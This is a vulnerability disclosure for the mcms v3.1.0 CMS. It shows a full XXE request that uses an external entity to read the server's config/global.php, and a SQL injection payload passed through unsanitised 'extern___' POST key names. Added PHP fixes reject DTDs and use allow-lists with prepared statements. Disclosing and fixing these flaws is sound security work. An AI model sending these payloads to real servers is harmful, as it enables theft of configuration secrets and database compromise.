### Brief description:

rt (as in the title)

### Details:

First, the arbitrary file read.

For the previously submitted report [WooYun: mcms v3.1.0 SQL injection + arbitrary file read](http://www.wooyun.org/bugs/wooyun-2015-090986), the vendor's fix was:

```
$wx = new weixin();
$_GET  = H::sqlxss($_GET);
$_POST = H::sqlxss($_POST);
...........
function response_msg(){
    global $dbm, $C;
    $postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
    if(!empty($postStr)){
        $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
        $fromUsername = $postObj->FromUserName;
        $toUsername   = $postObj->ToUserName;
        ...
        $keyword = trim($postObj->Content);
        $keyword = H::sqlxss($keyword);
```

In other words, they added just these lines:

```
$_GET  = H::sqlxss($_GET);
$_POST = H::sqlxss($_POST);
$keyword = H::sqlxss($keyword);
```

The injection no longer works. But arbitrary file read is still possible: `H::sqlxss` only touches `$_GET`, `$_POST` and the extracted keyword, while the raw XML body is still passed straight to `simplexml_load_string`, which resolves the external entity. POST:

```
POST //app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9vl7m4ivoovc76am47nrnr3m81; CNZZDATA1253530733=784223860-1426700537-%7C1426700537; skip_url=mycenter.php
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: text/xml
Content-Length: 262

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE copyright [
<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/Wamp/www/config/global.php">
]>
<xml>
<ToUserName>&test;</ToUserName>
<Content>a\</Content>
</xml>
```

![1.png](https://images.seebug.org/upload/201503/190243227e2c76e8065c15d6f658b8dcc0009141.png)

![2.png](https://images.seebug.org/upload/201503/19024329bff27c37615ebc73e574eccc0f332ee9.png)

Now for the injection.
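Before turning to the injection, here is what a fix for the XML side of the file-read issue above looks like. This is an added example written for this page, not code from the report or from mcms: a replacement for the `simplexml_load_string` call in `response_msg()` that refuses any document carrying a DTD and disables the external entity loader, so an `&test;`-style reference can never reach the filesystem. The function name `parse_wechat_xml` and the two sample bodies are assumptions constructed for the example.

```php
<?php
// Added example, not mcms code. Parses an inbound WeChat notification body
// with DTD processing refused, so entity declarations cannot be used to
// pull local files into the parsed document. Names are assumptions.

function parse_wechat_xml(string $postStr): ?SimpleXMLElement
{
    // A genuine WeChat push never carries a DOCTYPE or entity declaration;
    // refusing them up front stops both internal and external entities.
    if (stripos($postStr, '<!DOCTYPE') !== false || stripos($postStr, '<!ENTITY') !== false) {
        return null;
    }

    // PHP < 8.0 resolves external entities unless the loader is disabled;
    // PHP 8.0+ disables it by default and deprecates this call.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    $prevErrorMode = libxml_use_internal_errors(true);

    // LIBXML_NONET blocks any network fetch during parsing.
    // LIBXML_NOENT is deliberately absent so entities are never substituted.
    $obj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA | LIBXML_NONET);

    libxml_clear_errors();
    libxml_use_internal_errors($prevErrorMode);
    return $obj === false ? null : $obj;
}

// Constructed sample inputs (not captured traffic).
$legit = '<xml><ToUserName><![CDATA[gh_1]]></ToUserName>'
       . '<FromUserName><![CDATA[u1]]></FromUserName>'
       . '<Content><![CDATA[hello]]></Content></xml>';
$withDtd = '<?xml version="1.0"?><!DOCTYPE x [<!ENTITY e "x">]>'
         . '<xml><ToUserName>&e;</ToUserName></xml>';

$ok = parse_wechat_xml($legit);
echo 'legitimate body parsed: ', var_export($ok !== null && (string)$ok->Content === 'hello', true), PHP_EOL;
echo 'body with DTD rejected: ', var_export(parse_wechat_xml($withDtd) === null, true), PHP_EOL;
```

The DOCTYPE check is the layer that matters most: it does not depend on the PHP version or on which libxml flags a later maintainer adds, and a rejected message simply gets no reply, which is the correct outcome for input WeChat would never send. On PHP 7+, `$GLOBALS["HTTP_RAW_POST_DATA"]` is gone as well, so the body would be read with `file_get_contents('php://input')` before being handed to this function.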
D:/wamp/www/app/user/info.php:

```
function m__save(){
    global $dbm, $C, $V;
    $_POST['info_body'] = strip_tags($_POST['info_body'], ' <p><a><img>');
    $_POST = H::sqlxss($_POST);
    // handle attachment parameters
    $attach = $oname = $order = $model_fields = array();
    foreach($_POST as $k => $v){
        if(substr($k,0,9)=='attach___'){
            $attach[$v] = $v;
            $oname[$v]  = ($_POST['oname___'.$v]==''?'':$_POST['oname___'.$v]);
            $order[$v]  = ($_POST['order___'.$v]==''?'':$_POST['order___'.$v]);
        }
        if (substr($k,0,9)=='extern___') {
            // fill the extension-table fields
            $model_fields[substr($k,9)] = $v;
        }
    }
    ......
    if($fields['model_name']!=''){
        $model_fields['info_id'] = $info_id;
        // pre-process certain values, e.g. dates
        foreach($model_fields as $k => $v) {
            $sql = "select form_type from ".TB_PRE."model_fields where model_name='".$fields['model_name']."' and field_name='".$k."' limit 1";
```

Because `H::sqlxss` filters only the values of `$_POST` and never the key names, the part of the `extern___` key after the prefix is concatenated unescaped into `field_name='...'`, which produces an injection. POST:

```
info_id=1&cate_id=2&model_name=product&info_title=aaaaaa&info_img=&info_body=11&extern___test 'sql语句=1
```

(`sql语句` is the author's placeholder for the injected SQL fragment.)

![11.png](https://images.seebug.org/upload/201503/19025030d6bdb397b69059caf1a4886212964be1.png)

As you can see, the single quote gets through. Time-based blind injection is possible.

### Proof of vulnerability:

![11.png](https://images.seebug.org/upload/201503/19025030d6bdb397b69059caf1a4886212964be1.png)

![1.png](https://images.seebug.org/upload/201503/190243227e2c76e8065c15d6f658b8dcc0009141.png)
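The root cause in `m__save()` is that a request parameter *name* becomes a SQL identifier value, and value-oriented sanitizers such as `H::sqlxss` never look at names. The following is an added example written for this page, not code from the report or from mcms, showing the two layers a fix needs: an allow-list on the `extern___` suffix, and a prepared statement for the `model_fields` lookup so nothing is concatenated into SQL at all. The function names, the `TB_PRE` value, the in-memory SQLite table and the sample POST array are all assumptions constructed for the example.

```php
<?php
// Added example, not mcms code. Hardens the extern___ handling from m__save()
// in two independent layers: the field name (a SQL identifier that H::sqlxss
// never sees) must match a strict allow-list pattern, and the lookup is a
// prepared statement. Names, TB_PRE and the sample data are assumptions.

const TB_PRE = 'mc_';   // assumed prefix; the original code uses a TB_PRE constant

// Accept only extern___ keys whose suffix is a plain identifier. Anything
// else (quotes, spaces, comment sequences) is dropped and reported.
function collect_extern_fields(array $post): array
{
    $fields = [];
    $rejected = [];
    foreach ($post as $k => $v) {
        if (substr($k, 0, 9) !== 'extern___') {
            continue;
        }
        $name = substr($k, 9);
        if (preg_match('/^[A-Za-z][A-Za-z0-9_]{0,63}$/', $name)) {
            $fields[$name] = $v;
        } else {
            $rejected[] = $name;
        }
    }
    return [$fields, $rejected];
}

// Look up form_type with bound parameters instead of string building.
function lookup_form_type(PDO $db, string $modelName, string $fieldName): ?string
{
    $stmt = $db->prepare(
        'SELECT form_type FROM ' . TB_PRE . 'model_fields WHERE model_name = ? AND field_name = ? LIMIT 1'
    );
    $stmt->execute([$modelName, $fieldName]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['form_type'];
}

// Constructed in-memory schema standing in for the real model_fields table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ' . TB_PRE . 'model_fields (model_name TEXT, field_name TEXT, form_type TEXT)');
$db->exec("INSERT INTO " . TB_PRE . "model_fields VALUES ('product', 'test', 'text')");

// Constructed request parameters mirroring the shape of the report's POST.
$post = [
    'model_name'      => 'product',
    'extern___test'   => '1',
    "extern___test'"  => '1',   // malformed key: rejected before any SQL is built
];

[$fields, $rejected] = collect_extern_fields($post);
foreach ($fields as $name => $value) {
    printf("%s => form_type %s\n", $name, lookup_form_type($db, $post['model_name'], $name) ?? 'unknown');
}
foreach ($rejected as $name) {
    // Log with json_encode so the offending characters are visible verbatim.
    error_log('rejected extension field name: ' . json_encode($name));
}
```

Either layer on its own closes this particular hole; keeping both means a future query that forgets to bind parameters still only ever sees identifier-shaped names, and the rejection log gives operators a signal that someone is probing parameter names, which a silent sanitizer never provides.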